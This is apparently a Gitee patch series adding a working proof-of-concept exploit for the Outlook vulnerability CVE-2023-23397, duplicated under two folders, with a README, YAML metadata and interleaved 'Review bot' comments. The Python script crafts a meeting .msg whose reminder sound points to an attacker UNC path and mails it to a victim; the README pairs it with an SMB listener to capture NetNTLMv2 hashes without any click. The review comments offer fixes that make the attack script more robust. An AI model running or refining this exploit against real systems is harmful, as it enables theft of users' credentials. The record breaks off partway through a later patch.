From dd8092788d241ed801dcaf4b6d09d81332d736bc Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 14:45:35 +0000 Subject: [PATCH 01/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From dfa7563c15fa592ec10814e0a35eac2e31123d7d Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 14:45:45 +0000 Subject: [PATCH 02/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 862fcd27b0602f0e137e6739deb737abe3357424 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:03:23 +0000 Subject: [PATCH 03/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f13be9baf18cbb05daf44064834c5a367190946c Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:08:10 +0000 Subject: [PATCH 04/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/.keep 
diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From dbad32b4b44e13cbdbbc1e720cb573c352f26b97 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:09:17 +0000 Subject: [PATCH 05/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20Outlook?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ac03f0f3c3f34076fbdfe8d3936b49e6f30dd506 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:10:01 +0000 Subject: [PATCH 06/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-23397?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/CVE-2023-23397/.keep diff --git a/cve/Outlook/CVE-2023-23397/.keep b/cve/Outlook/CVE-2023-23397/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From cef6f58176dbde78b9f7bb824f499d4d84d7668a Mon Sep 17 00:00:00 2001 
From: Victoria Date: Wed, 22 Mar 2023 15:10:49 +0000 Subject: [PATCH 07/24] =?UTF-8?q?=E4=B8=BB=E8=A6=81=E9=92=88=E5=AF=B9Outlo?= =?UTF-8?q?ok=E5=AE=A2=E6=88=B7=E7=AB=AF=E5=AF=B9=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BE=93=E5=85=A5=E6=8E=A7=E5=88=B6=E7=9A=84=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E9=97=AE=E9=A2=98=EF=BC=8C=E8=BF=9B=E8=A1=8C?= =?UTF-8?q?=E4=BF=AE=E5=A4=8D=EF=BC=8C=E4=B8=BB=E8=A6=81=E9=80=9A=E8=BF=87?= =?UTF-8?q?=E8=87=AA=E5=AE=9A=E4=B9=89SMTP=E6=9C=8D=E5=8A=A1=E5=99=A8?= =?UTF-8?q?=E7=94=B5=E5=AD=90=E9=82=AE=E4=BB=B6=E5=8F=91=E9=80=81=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=9D=A5=E8=A7=A3=E5=86=B3=E6=AD=A4=E7=B1=BB=E9=97=AE?= =?UTF-8?q?=E9=A2=98=E3=80=82=20Outlook=20=E7=BC=BA=E4=B9=8F=E5=AF=B9?= =?UTF-8?q?=E5=85=81=E8=AE=B8=E9=85=8D=E7=BD=AE=E4=BC=9A=E8=AE=AE=E5=92=8C?= =?UTF-8?q?=E7=BA=A6=E4=BC=9A=E6=8F=90=E9=86=92=E5=A3=B0=E9=9F=B3=E7=9A=84?= =?UTF-8?q?=E7=94=A8=E6=88=B7=E8=BE=93=E5=85=A5=E7=9A=84=E6=8E=A7=E5=88=B6?= =?UTF-8?q?=E3=80=82=E4=BA=8B=E5=AE=9E=E4=B8=8A=EF=BC=8C=E6=94=BB=E5=87=BB?= =?UTF-8?q?=E8=80=85=E8=83=BD=E5=A4=9F=E5=BC=BA=E8=BF=AB=E5=8F=97=E5=AE=B3?= =?UTF-8?q?=E8=80=85=E8=BF=9E=E6=8E=A5=E5=88=B0=E5=85=B6=E6=9C=8D=E5=8A=A1?= =?UTF-8?q?=E5=99=A8=EF=BC=8C=E8=80=8C=E6=97=A0=E9=9C=80=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BF=9B=E8=A1=8C=E4=BB=BB=E4=BD=95=E6=93=8D=E7=BA=B5=EF=BC=88?= =?UTF-8?q?=E9=9B=B6=E7=82=B9=E5=87=BB=E6=BC=8F=E6=B4=9E=EF=BC=89=E3=80=82?= =?UTF-8?q?=20=E5=88=A9=E7=94=A8=E6=AD=A4=E6=BC=8F=E6=B4=9E=E7=9A=84?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E8=80=85=E9=80=9A=E8=BF=87=20SMB=20=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=A0=B9=E6=8D=AE=E8=A2=AB=E5=9B=B0=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E7=9A=84=E5=AF=86=E7=A0=81=E6=A3=80=E7=B4=A2=20NetNTLMv2=20?= =?UTF-8?q?=E6=91=98=E8=A6=81=EF=BC=8C=E9=82=AE=E4=BB=B6=E5=88=B0=E8=BE=BE?= =?UTF-8?q?=E6=94=B6=E4=BB=B6=E7=AE=B1=E5=90=8E=EF=BC=8C=E5=B0=86=E7=AB=8B?= =?UTF-8?q?=E5=8D=B3=E8=A7=A6=E5=8F=91=E8=AF=B7=E6=B1=82=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 
Content-Transfer-Encoding: 8bit Signed-off-by: Victoria --- cve/Outlook/CVE-2023-23397/CVE-2023-23397.py | 70 ++++++++++++++++++++ cve/Outlook/CVE-2023-23397/README.md | 41 ++++++++++++ 2 files changed, 111 insertions(+) create mode 100644 cve/Outlook/CVE-2023-23397/CVE-2023-23397.py create mode 100644 cve/Outlook/CVE-2023-23397/README.md diff --git a/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py new file mode 100644 index 00000000..e40c7318 --- /dev/null +++ b/cve/Outlook/CVE-2023-23397/CVE-2023-23397.py 
@@ -0,0 +1,70 @@ +import smtplib, datetime, argparse +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +from email.mime.application import MIMEApplication +from email.utils import COMMASPACE, formatdate +from independentsoft.msg import Message + +# Mail configuration : change it ! +smtp_server = "mail.example.com" +smtp_port = 587 + +sender_email = "attacker@mail.example.com" +sender_password = "P@ssw0rd" + +recipients_email = ["victim@mail.example.com"] + +class Email: + def __init__(self, smtp_server, port, username, password, recipient): + self.smtp_server = smtp_server + self.port = port + self.username = username + self.password = password + self.recipient = recipient + + def send(self, subject, body, attachment_path): + msg = MIMEMultipart() + msg['From'] = self.username + msg['To'] = COMMASPACE.join(self.recipient) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach(MIMEText(body)) + + with open(attachment_path, 'rb') as f: + part = MIMEApplication(f.read(), Name=attachment_path) + part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' + msg.attach(part) + + try: + server = smtplib.SMTP(self.smtp_server, self.port) + server.starttls() + server.login(self.username, self.password) + server.sendmail(self.username, self.recipient, msg.as_string()) + server.quit() + print("[+] Malicious appointment sent !") + + + except Exception as e: + print("[-] Error with SMTP server...", e) + +parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') +parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) +args = parser.parse_args() + +appointment = Message() +appointment.message_class = "IPM.Appointment" +appointment.subject = "CVE-2023-23397" +appointment.body = "New meeting now !" 
+appointment.location = "Paris" +appointment.appointment_start_time = datetime.datetime.now() +appointment.appointment_end_time = datetime.datetime.now() +appointment.reminder_override_default = True +appointment.reminder_sound_file = args.path +appointment.save("appointment.msg") + +email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) + +subject = "Hello There !" +body = "Important appointment !" +email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/CVE-2023-23397/README.md b/cve/Outlook/CVE-2023-23397/README.md new file mode 100644 index 00000000..094e829d --- /dev/null +++ b/cve/Outlook/CVE-2023-23397/README.md @@ -0,0 +1,41 @@ +# CVE-2023-23397 + +Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. + +## Description + +Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + +An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. + +## What does the poc do? + +1. Generated `.msg` payload. +2. Send it by email with custom SMTP server. + +## Usage + +In one session : + +```python +python CVE-2023-23397.py + +usage: CVE-2023-23397.py [-h] -p PATH +CVE-2023-23397.py: error: the following arguments are required: -p/--path + +python CVE-2023-23397.py --path '\\yourip\' +``` + +In a second session (`smbserver` or `responder` as you want). + +``` +smbserver.py -smb2support SHARE . +``` + +## Demo (manual poc) + +![poc](poc.gif) + +## Original article + +https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file -- Gitee 
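Review bot: `server.starttls()` in `Email.send` is called without an SSL context, and as far as I can tell smtplib then falls back to an unverified stdlib context (no certificate or hostname check), so the operator's SMTP password sent by the following `server.login(...)` is exposed to anyone on the path; pass `context=ssl.create_default_context()` and add `import ssl` to the import block. The same block also leaks the connection whenever `login` or `sendmail` raises, because `server.quit()` is only reached on success — a `with smtplib.SMTP(...) as server:` block closes it on every path. The `except Exception` swallows programming errors too and the script still exits 0; narrowing it to `(smtplib.SMTPException, OSError)` keeps real bugs visible while still reporting server failures.
```python
        # … unchanged: MIME message assembly …
        try:
            # Verify the server certificate; starttls() with no context does not.
            with smtplib.SMTP(self.smtp_server, self.port) as server:
                server.starttls(context=ssl.create_default_context())
                server.login(self.username, self.password)
                server.sendmail(self.username, self.recipient, msg.as_string())
            print("[+] Malicious appointment sent !")
        except (smtplib.SMTPException, OSError) as e:
            print("[-] Error with SMTP server...", e)
```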
From 2369dcb312ace1d859c5f1120c5d386dae0f9963 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:10:57 +0000 Subject: [PATCH 08/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/CVE-2023-23397/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/CVE-2023-23397/.keep diff --git a/cve/Outlook/CVE-2023-23397/.keep b/cve/Outlook/CVE-2023-23397/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From be9a6db30283b34230ec837ccb60b756b0ef017b Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:11:05 +0000 Subject: [PATCH 09/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/.keep diff --git a/cve/Outlook/.keep b/cve/Outlook/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 411011aff0fbad92b0b40e901dcda4a20efcdfc7 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:11:13 +0000 Subject: [PATCH 10/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/yaml/.keep diff --git a/cve/Outlook/yaml/.keep b/cve/Outlook/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d65fac840744f4fb315166dd8d93bb0803a6685c Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:11:56 +0000 Subject: [PATCH 11/24] add cve/Outlook/yaml/CVE-2023-23397.yaml. 
Signed-off-by: Victoria --- cve/Outlook/yaml/CVE-2023-23397.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/Outlook/yaml/CVE-2023-23397.yaml diff --git a/cve/Outlook/yaml/CVE-2023-23397.yaml b/cve/Outlook/yaml/CVE-2023-23397.yaml new file mode 100644 index 00000000..f5183573 --- /dev/null +++ b/cve/Outlook/yaml/CVE-2023-23397.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-23397 +source: https://github.com/Trackflaw/CVE-2023-23397 +info: + name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 + severity: critical + description: | + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + scope-of-influence: + outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23397 + cwe-id: CWE-294 + cnvd-id: None + kve-id: None + tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file -- Gitee From 13cb9a9e915293baf9f593ae549789fde7ec77e7 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:12:05 +0000 Subject: [PATCH 12/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/yaml/.keep diff --git a/cve/Outlook/yaml/.keep b/cve/Outlook/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee 
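Review bot: `scope-of-influence` is written as a single comma-joined scalar (`outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019`) while `reference:` in the same file is a proper YAML list, so any consumer has to split the string itself, and the missing space after `outlook-2019,` shows how easily that drifts; one product per `- ` line is consistent with the rest of the file. `tags:` has the same shape. The `name:` field also carries a whole paragraph that largely duplicates `description:`; a one-line name such as `Microsoft Outlook 特权提升漏洞 (NetNTLMv2 credential leak via reminder sound path)` keeps the two fields distinct and the file greppable.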
From 7e179918dcaebd56da6bacce074c6abf489de427 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:12:26 +0000 Subject: [PATCH 13/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/2023/.keep diff --git a/cve/Outlook/2023/.keep b/cve/Outlook/2023/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 554d943b966e572aa044cbe6a865cf10334c3c79 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:13:03 +0000 Subject: [PATCH 14/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-23397?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/2023/CVE-2023-23397/.keep diff --git a/cve/Outlook/2023/CVE-2023-23397/.keep b/cve/Outlook/2023/CVE-2023-23397/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 707fa6b4e8480756dc1b3bd3e1c87154702b5878 Mon Sep 17 00:00:00 2001 
From: Victoria Date: Wed, 22 Mar 2023 15:14:08 +0000 Subject: [PATCH 15/24] =?UTF-8?q?=E4=B8=BB=E8=A6=81=E9=92=88=E5=AF=B9Outlo?= =?UTF-8?q?ok=E5=AE=A2=E6=88=B7=E7=AB=AF=E5=AF=B9=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BE=93=E5=85=A5=E6=8E=A7=E5=88=B6=E7=9A=84=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E9=97=AE=E9=A2=98=EF=BC=8C=E8=BF=9B=E8=A1=8C?= =?UTF-8?q?=E4=BF=AE=E5=A4=8D=EF=BC=8C=E4=B8=BB=E8=A6=81=E9=80=9A=E8=BF=87?= =?UTF-8?q?=E8=87=AA=E5=AE=9A=E4=B9=89SMTP=E6=9C=8D=E5=8A=A1=E5=99=A8?= =?UTF-8?q?=E7=94=B5=E5=AD=90=E9=82=AE=E4=BB=B6=E5=8F=91=E9=80=81=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=9D=A5=E8=A7=A3=E5=86=B3=E6=AD=A4=E7=B1=BB=E9=97=AE?= =?UTF-8?q?=E9=A2=98=E3=80=82=20Outlook=20=E7=BC=BA=E4=B9=8F=E5=AF=B9?= =?UTF-8?q?=E5=85=81=E8=AE=B8=E9=85=8D=E7=BD=AE=E4=BC=9A=E8=AE=AE=E5=92=8C?= =?UTF-8?q?=E7=BA=A6=E4=BC=9A=E6=8F=90=E9=86=92=E5=A3=B0=E9=9F=B3=E7=9A=84?= =?UTF-8?q?=E7=94=A8=E6=88=B7=E8=BE=93=E5=85=A5=E7=9A=84=E6=8E=A7=E5=88=B6?= =?UTF-8?q?=E3=80=82=E4=BA=8B=E5=AE=9E=E4=B8=8A=EF=BC=8C=E6=94=BB=E5=87=BB?= =?UTF-8?q?=E8=80=85=E8=83=BD=E5=A4=9F=E5=BC=BA=E8=BF=AB=E5=8F=97=E5=AE=B3?= =?UTF-8?q?=E8=80=85=E8=BF=9E=E6=8E=A5=E5=88=B0=E5=85=B6=E6=9C=8D=E5=8A=A1?= =?UTF-8?q?=E5=99=A8=EF=BC=8C=E8=80=8C=E6=97=A0=E9=9C=80=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E8=BF=9B=E8=A1=8C=E4=BB=BB=E4=BD=95=E6=93=8D=E7=BA=B5=EF=BC=88?= =?UTF-8?q?=E9=9B=B6=E7=82=B9=E5=87=BB=E6=BC=8F=E6=B4=9E=EF=BC=89=E3=80=82?= =?UTF-8?q?=20=E5=88=A9=E7=94=A8=E6=AD=A4=E6=BC=8F=E6=B4=9E=E7=9A=84?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E8=80=85=E9=80=9A=E8=BF=87=20SMB=20=E8=AF=B7?= =?UTF-8?q?=E6=B1=82=E6=A0=B9=E6=8D=AE=E8=A2=AB=E5=9B=B0=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E7=9A=84=E5=AF=86=E7=A0=81=E6=A3=80=E7=B4=A2=20NetNTLMv2=20?= =?UTF-8?q?=E6=91=98=E8=A6=81=EF=BC=8C=E9=82=AE=E4=BB=B6=E5=88=B0=E8=BE=BE?= =?UTF-8?q?=E6=94=B6=E4=BB=B6=E7=AE=B1=E5=90=8E=EF=BC=8C=E5=B0=86=E7=AB=8B?= =?UTF-8?q?=E5=8D=B3=E8=A7=A6=E5=8F=91=E8=AF=B7=E6=B1=82=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 
Content-Transfer-Encoding: 8bit Signed-off-by: Victoria --- .../2023/CVE-2023-23397/CVE-2023-23397.py | 70 +++++++++++++++++++ cve/Outlook/2023/CVE-2023-23397/README.md | 41 +++++++++++ 2 files changed, 111 insertions(+) create mode 100644 cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py create mode 100644 cve/Outlook/2023/CVE-2023-23397/README.md diff --git a/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py new file mode 100644 index 00000000..e40c7318 --- /dev/null +++ b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py 
@@ -0,0 +1,70 @@ +import smtplib, datetime, argparse +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +from email.mime.application import MIMEApplication +from email.utils import COMMASPACE, formatdate +from independentsoft.msg import Message + +# Mail configuration : change it ! +smtp_server = "mail.example.com" +smtp_port = 587 + +sender_email = "attacker@mail.example.com" +sender_password = "P@ssw0rd" + +recipients_email = ["victim@mail.example.com"] + +class Email: + def __init__(self, smtp_server, port, username, password, recipient): + self.smtp_server = smtp_server + self.port = port + self.username = username + self.password = password + self.recipient = recipient + + def send(self, subject, body, attachment_path): + msg = MIMEMultipart() + msg['From'] = self.username + msg['To'] = COMMASPACE.join(self.recipient) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach(MIMEText(body)) + + with open(attachment_path, 'rb') as f: + part = MIMEApplication(f.read(), Name=attachment_path) + part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' + msg.attach(part) + + try: + server = smtplib.SMTP(self.smtp_server, self.port) + server.starttls() + server.login(self.username, self.password) + server.sendmail(self.username, self.recipient, msg.as_string()) + server.quit() + print("[+] Malicious appointment sent !") + + + except Exception as e: + print("[-] Error with SMTP server...", e) + +parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') +parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) +args = parser.parse_args() + +appointment = Message() +appointment.message_class = "IPM.Appointment" +appointment.subject = "CVE-2023-23397" +appointment.body = "New meeting now !" 
+appointment.location = "Paris" +appointment.appointment_start_time = datetime.datetime.now() +appointment.appointment_end_time = datetime.datetime.now() +appointment.reminder_override_default = True +appointment.reminder_sound_file = args.path +appointment.save("appointment.msg") + +email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) + +subject = "Hello There !" +body = "Important appointment !" +email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/2023/CVE-2023-23397/README.md b/cve/Outlook/2023/CVE-2023-23397/README.md new file mode 100644 index 00000000..094e829d --- /dev/null +++ b/cve/Outlook/2023/CVE-2023-23397/README.md 
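Review bot: `sender_password = "P@ssw0rd"` places a plaintext mail credential in a tracked source file — and this series adds the same script twice, under `cve/Outlook/CVE-2023-23397/` and `cve/Outlook/2023/CVE-2023-23397/` — so anyone who fills in a real password before running it is one commit away from leaking it; read it from the environment, `sender_password = os.environ.get("SMTP_PASSWORD", "")` with `import os`, and `parser.error(...)` if it is empty. The `--path` help text `Local path to process` misdescribes the argument: per the README it must be a UNC path to the attacker's SMB listener (`\\ip\share\`), and nothing validates that, so `help='UNC path of the SMB listener, e.g. \\\\10.0.0.5\\share\\'` plus `if not args.path.startswith('\\\\'): parser.error('--path must be a UNC path')` would catch the common mistake. I would also note that the payload is delivered here as an attached `.msg` rather than as a native meeting request; whether Outlook evaluates the reminder-sound property of an attached `.msg` without the recipient opening it is not something this code demonstrates, so the README's "triggered as soon as the mail arrives" claim should be confirmed against the demo.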
@@ -0,0 +1,41 @@ +# CVE-2023-23397 + +Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. + +## Description + +Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + +An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. + +## What does the poc do? + +1. Generated `.msg` payload. +2. Send it by email with custom SMTP server. + +## Usage + +In one session : + +```python +python CVE-2023-23397.py + +usage: CVE-2023-23397.py [-h] -p PATH +CVE-2023-23397.py: error: the following arguments are required: -p/--path + +python CVE-2023-23397.py --path '\\yourip\' +``` + +In a second session (`smbserver` or `responder` as you want). + +``` +smbserver.py -smb2support SHARE . +``` + +## Demo (manual poc) + +![poc](poc.gif) + +## Original article + +https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file -- Gitee From 118df22c2d205d03bd0cd3f505434fa3299f5793 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:17 +0000 Subject: [PATCH 16/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/2023/CVE-2023-23397/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/CVE-2023-23397/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/2023/CVE-2023-23397/.keep diff --git a/cve/Outlook/2023/CVE-2023-23397/.keep b/cve/Outlook/2023/CVE-2023-23397/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee 
From e335e6d071c5b66abf54dfa3b8823e89f68ece19 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:29 +0000 Subject: [PATCH 17/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/2023/.keep diff --git a/cve/Outlook/2023/.keep b/cve/Outlook/2023/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e961cc5f00e859251c77eeda15dec8f42a81f18c Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:14:36 +0000 Subject: [PATCH 18/24] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Outlook/2023/yaml/.keep diff --git a/cve/Outlook/2023/yaml/.keep b/cve/Outlook/2023/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 31d4921bd1900faaa3a7a78e665dd392641d05cf Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:15:38 +0000 Subject: [PATCH 19/24] add cve/Outlook/2023/yaml/CVE-2023-23397.yaml. Signed-off-by: Victoria --- cve/Outlook/2023/yaml/CVE-2023-23397.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/Outlook/2023/yaml/CVE-2023-23397.yaml diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml new file mode 100644 index 00000000..f5183573 --- /dev/null +++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml 
